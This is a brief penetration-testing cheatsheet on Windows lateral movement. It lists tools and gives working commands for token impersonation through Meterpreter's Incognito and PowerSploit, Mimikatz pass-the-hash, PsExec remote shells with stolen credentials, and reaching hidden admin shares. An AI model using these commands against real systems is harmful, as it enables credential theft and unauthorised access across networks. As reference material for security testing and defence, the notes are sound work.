

---
title: Lateral Movement
date: 2021-01-13
categories: [cheatsheets]
tags: [security, windows]
---

# Lateral Movement

Detailed information:

https://fuzzysecurity.com/tutorials/25.html

Tools:

- nbtscan # get NetBIOS information for a host
- PsExec # get a shell on another host with credentials, or with a hash only!
- Mimikatz # dump hashes, passwords, and do pretty much everything
- Incognito # tool to impersonate tokens

## Smash-and-grab

- get whatever credentials you can and try to use them
- passwords or hashes, doesn't matter

## Token impersonation

Grab the tokens of other users (using NtQuerySystemInformation voodoo) and impersonate them to do stuff as another user!

-> the target user must be logged in!

```
<meterpreter session>
incognito> list_tokens -u
incognito> impersonate_token DOMAIN\username
```

Or, if it works, use PowerSploit:

```powershell
Invoke-TokenManipulation
```

## Mimikatz

Local Pass the Hash:

```
mimikatz> privilege::debug      # request SeDebugPrivilege; "Privilege '20' OK" means it is set
mimikatz> sekurlsa::pth /user:<user> /domain:. /ntlm:<hash>
```

## PsExec

- metasploit module: exploit/windows/smb/psexec
- Microsoft (Sysinternals) one: `cmd> PsExec.exe \\10.0.0.100 -u <user> -p <pass> cmd`

## Admin shares

Admin shares are created automatically by Windows and expose every partition as a hidden administrative share: C:\ is reachable as \\<ip>\C$ (plus \\<ip>\ADMIN$ for the Windows directory).